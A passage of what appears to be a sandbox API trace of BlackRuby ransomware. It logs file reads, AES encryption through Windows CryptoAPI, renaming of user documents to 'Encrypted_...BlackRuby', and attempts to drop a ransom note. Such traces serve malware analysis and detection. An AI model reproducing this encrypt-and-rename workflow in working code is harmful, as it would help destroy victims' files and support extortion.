J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\hm1sbbw3drniwgii.ots"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff9e69e0, ftCreationTime.dwHighDateTime=0x1d359de, ftLastAccessTime.dwLowDateTime=0xd8d6fe20, ftLastAccessTime.dwHighDateTime=0x1d34a94, ftLastWriteTime.dwLowDateTime=0xd8d6fe20, ftLastWriteTime.dwHighDateTime=0x1d34a94, nFileSizeHigh=0x0, nFileSizeLow=0x4272)) returned 1 [0058.954] GetLastError () returned 0x0 [0058.954] SetErrorMode (uMode=0x0) returned 0x1 [0058.954] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c790) returned 1 [0058.955] GetLastError () returned 0x0 [0058.991] CryptImportKey (in: hProv=0x37c790, pbData=0x1b82200, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ce0) returned 1 [0058.991] GetLastError () returned 0x0 [0058.991] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.991] GetLastError () returned 0x0 [0058.996] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.996] GetLastError () returned 0x0 [0058.996] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360b60) returned 1 [0058.996] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.996] GetLastError () returned 0x0 [0058.997] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1baf24c*=0x1, dwFlags=0x0) returned 1 [0058.997] GetLastError () returned 0x0 [0058.997] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1baf218, dwFlags=0x0) returned 1 [0058.997] GetLastError () returned 0x0 [0058.997] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1baf294*, pdwDataLen=0x18eb58*=0x4370, dwBufLen=0x4370 | out: pbData=0x1baf294*, pdwDataLen=0x18eb58*=0x4370) returned 1 [0058.997] GetLastError () returned 0x0 [0058.997] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bb79a0*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1bb79a0*, pdwDataLen=0x18eb70*=0x10) returned 1 [0058.997] GetLastError () returned 0x0 [0058.997] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bb79d0*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1bb79d0*, pdwDataLen=0x18eb78*=0x10) returned 1 [0058.997] GetLastError () returned 0x0 [0058.997] CryptDestroyKey (hKey=0x360ce0) returned 1 [0058.997] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.997] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0058.997] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", lpFilePart=0x0) returned 0x74 [0058.997] GetLastError () returned 0x0 [0058.997] SetErrorMode (uMode=0x1) returned 0x0 [0058.997] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\hm1sbbw3drniwgii.ots"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.998] GetLastError () returned 0xb7 [0058.998] GetFileType (hFile=0x184) returned 0x1 [0058.998] SetErrorMode (uMode=0x0) returned 0x1 [0058.998] GetFileType (hFile=0x184) returned 0x1 [0058.999] CloseHandle (hObject=0x184) returned 1 [0058.999] GetLastError () returned 0xb7 [0058.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", lpFilePart=0x0) returned 0x74 [0058.999] GetLastError () returned 0xb7 [0058.999] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_Wqy5b6n5Oo579KbJQWYbgIhtTggSN2t9P2hJH2k.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_Wqy5b6n5Oo579KbJQWYbgIhtTggSN2t9P2hJH2k.BlackRuby", lpFilePart=0x0) returned 0x9b [0058.999] GetLastError () returned 0xb7 [0058.999] SetErrorMode (uMode=0x1) returned 0x0 [0058.999] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\hm1sbbw3drniwgii.ots"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff9e69e0, ftCreationTime.dwHighDateTime=0x1d359de, ftLastAccessTime.dwLowDateTime=0xd8d6fe20, ftLastAccessTime.dwHighDateTime=0x1d34a94, ftLastWriteTime.dwLowDateTime=0x2b5b6040, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4380)) returned 1 [0058.999] GetLastError () returned 0xb7 [0058.999] SetErrorMode (uMode=0x0) returned 0x1 [0058.999] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\hm1sbbw3drniwgii.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_Wqy5b6n5Oo579KbJQWYbgIhtTggSN2t9P2hJH2k.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_wqy5b6n5oo579kbjqwybgihttggsn2t9p2hjh2k.blackruby")) returned 1 [0059.000] GetLastError () returned 0xb7 [0059.000] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0059.000] GetLastError () returned 0xb7 [0059.000] SetErrorMode (uMode=0x1) returned 0x0 [0059.000] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.000] GetLastError () returned 0x5 [0059.001] SetErrorMode (uMode=0x0) returned 0x1 [0059.001] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", lpFilePart=0x0) returned 0x70 [0059.001] GetLastError () returned 0x5 [0059.001] SetErrorMode (uMode=0x1) returned 0x0 [0059.001] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\qcehgcegepn.docx"), fInfoLevelId=0x0, lpFileInformation=0x1be1c70 | out: lpFileInformation=0x1be1c70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36d7cd0, ftCreationTime.dwHighDateTime=0x1d34af6, ftLastAccessTime.dwLowDateTime=0xef809e80, ftLastAccessTime.dwHighDateTime=0x1d35a00, ftLastWriteTime.dwLowDateTime=0xef809e80, ftLastWriteTime.dwHighDateTime=0x1d35a00, nFileSizeHigh=0x0, nFileSizeLow=0x6fe1)) returned 1 [0059.001] GetLastError () returned 0x5 [0059.001] SetErrorMode (uMode=0x0) returned 0x1 [0059.002] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", lpFilePart=0x0) returned 0x70 [0059.002] GetLastError () returned 0x5 [0059.002] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", lpFilePart=0x0) returned 0x70 [0059.002] GetLastError () returned 0x5 [0059.002] SetErrorMode (uMode=0x1) returned 0x0 [0059.002] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\qcehgcegepn.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.002] GetLastError () returned 0x0 [0059.002] GetFileType (hFile=0x184) returned 0x1 [0059.002] SetErrorMode (uMode=0x0) returned 0x1 [0059.002] GetFileType (hFile=0x184) returned 0x1 [0059.002] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x6fe1 [0059.002] GetLastError () returned 0x0 [0059.002] ReadFile (in: hFile=0x184, lpBuffer=0x1be3f28, nNumberOfBytesToRead=0x6fe1, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1be3f28*, lpNumberOfBytesRead=0x18eb68*=0x6fe1, lpOverlapped=0x0) returned 1 [0059.003] GetLastError () returned 0x0 [0059.003] CloseHandle (hObject=0x184) returned 1 [0059.003] GetLastError () returned 0x0 [0059.003] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", lpFilePart=0x0) returned 0x70 [0059.003] GetLastError () returned 0x0 [0059.003] SetErrorMode (uMode=0x1) returned 0x0 [0059.003] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\qcehgcegepn.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36d7cd0, ftCreationTime.dwHighDateTime=0x1d34af6, ftLastAccessTime.dwLowDateTime=0xef809e80, ftLastAccessTime.dwHighDateTime=0x1d35a00, ftLastWriteTime.dwLowDateTime=0xef809e80, ftLastWriteTime.dwHighDateTime=0x1d35a00, nFileSizeHigh=0x0, nFileSizeLow=0x6fe1)) returned 1 [0059.003] GetLastError () returned 0x0 [0059.003] SetErrorMode (uMode=0x0) returned 0x1 [0059.003] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c680) returned 1 [0059.004] GetLastError () returned 0x0 [0059.038] CryptImportKey (in: hProv=0x37c680, pbData=0x1c4c328, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ea0) returned 1 [0059.038] GetLastError () returned 0x0 [0059.038] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.038] GetLastError () returned 0x0 [0059.043] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.043] GetLastError () returned 0x0 [0059.043] CryptDuplicateKey (in: hKey=0x360ea0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360f60) returned 1 [0059.043] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.043] GetLastError () returned 0x0 [0059.043] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1c79374*=0x1, dwFlags=0x0) returned 1 [0059.043] GetLastError () returned 0x0 [0059.043] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1c79340, dwFlags=0x0) returned 1 [0059.043] GetLastError () returned 0x0 [0059.043] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c793bc*, pdwDataLen=0x18eb58*=0x70e0, dwBufLen=0x70e0 | out: pbData=0x1c793bc*, pdwDataLen=0x18eb58*=0x70e0) returned 1 [0059.044] GetLastError () returned 0x0 [0059.044] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c875a8*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c875a8*, pdwDataLen=0x18eb70*=0x10) returned 1 [0059.044] GetLastError () returned 0x0 [0059.044] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c875d8*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c875d8*, pdwDataLen=0x18eb78*=0x10) returned 1 [0059.044] GetLastError () returned 0x0 [0059.044] CryptDestroyKey (hKey=0x360ea0) returned 1 [0059.044] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.044] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.044] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", lpFilePart=0x0) returned 0x70 [0059.044] GetLastError () returned 0x0 [0059.044] SetErrorMode (uMode=0x1) returned 0x0 [0059.044] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\qcehgcegepn.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.045] GetLastError () returned 0xb7 [0059.045] GetFileType (hFile=0x184) returned 0x1 [0059.045] SetErrorMode (uMode=0x0) returned 0x1 [0059.045] GetFileType (hFile=0x184) returned 0x1 [0059.046] CloseHandle (hObject=0x184) returned 1 [0059.046] GetLastError () returned 0xb7 [0059.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx", lpFilePart=0x0) returned 0x70 [0059.046] GetLastError () returned 0xb7 [0059.046] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_Jh1If9NsiRlQaEx5ZnkqDE8Vh6nRENH3aRkFJ5RzxNObYq.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_Jh1If9NsiRlQaEx5ZnkqDE8Vh6nRENH3aRkFJ5RzxNObYq.BlackRuby", lpFilePart=0x0) returned 0xa2 [0059.046] GetLastError () returned 0xb7 [0059.046] SetErrorMode (uMode=0x1) returned 0x0 [0059.046] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\qcehgcegepn.docx"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36d7cd0, ftCreationTime.dwHighDateTime=0x1d34af6, ftLastAccessTime.dwLowDateTime=0xef809e80, ftLastAccessTime.dwHighDateTime=0x1d35a00, ftLastWriteTime.dwLowDateTime=0x2b628460, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x70f0)) returned 1 [0059.046] GetLastError () returned 0xb7 [0059.046] SetErrorMode (uMode=0x0) returned 0x1 [0059.046] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\qcEHGCEGEpN.docx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\qcehgcegepn.docx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_Jh1If9NsiRlQaEx5ZnkqDE8Vh6nRENH3aRkFJ5RzxNObYq.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_jh1if9nsirlqaex5znkqde8vh6nrenh3arkfj5rzxnobyq.blackruby")) returned 1 [0059.047] GetLastError () returned 0xb7 [0059.047] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0059.047] GetLastError () returned 0xb7 [0059.047] SetErrorMode (uMode=0x1) returned 0x0 [0059.047] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.047] GetLastError () returned 0x5 [0059.048] SetErrorMode (uMode=0x0) returned 0x1 [0059.048] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", lpFilePart=0x0) returned 0x71 [0059.048] GetLastError () returned 0x5 [0059.048] SetErrorMode (uMode=0x1) returned 0x0 [0059.048] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\rzi5xoyjnl9t.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x1cba0c8 | out: lpFileInformation=0x1cba0c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb2158d0, ftCreationTime.dwHighDateTime=0x1d34c40, ftLastAccessTime.dwLowDateTime=0xed0f87b0, ftLastAccessTime.dwHighDateTime=0x1d34a0b, ftLastWriteTime.dwLowDateTime=0xed0f87b0, ftLastWriteTime.dwHighDateTime=0x1d34a0b, nFileSizeHigh=0x0, nFileSizeLow=0xba67)) returned 1 [0059.048] GetLastError () returned 0x5 [0059.048] SetErrorMode (uMode=0x0) returned 0x1 [0059.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", lpFilePart=0x0) returned 0x71 [0059.049] GetLastError () returned 0x5 [0059.049] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\rzI5xoyJNL9T.xlsx", lpFilePart=0x0) returned 0x71 [0059.049] GetLastError () returned 0x5 [0059.049] SetErrorMode (uMode=0x1) returned 0x0 [0059.049] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A 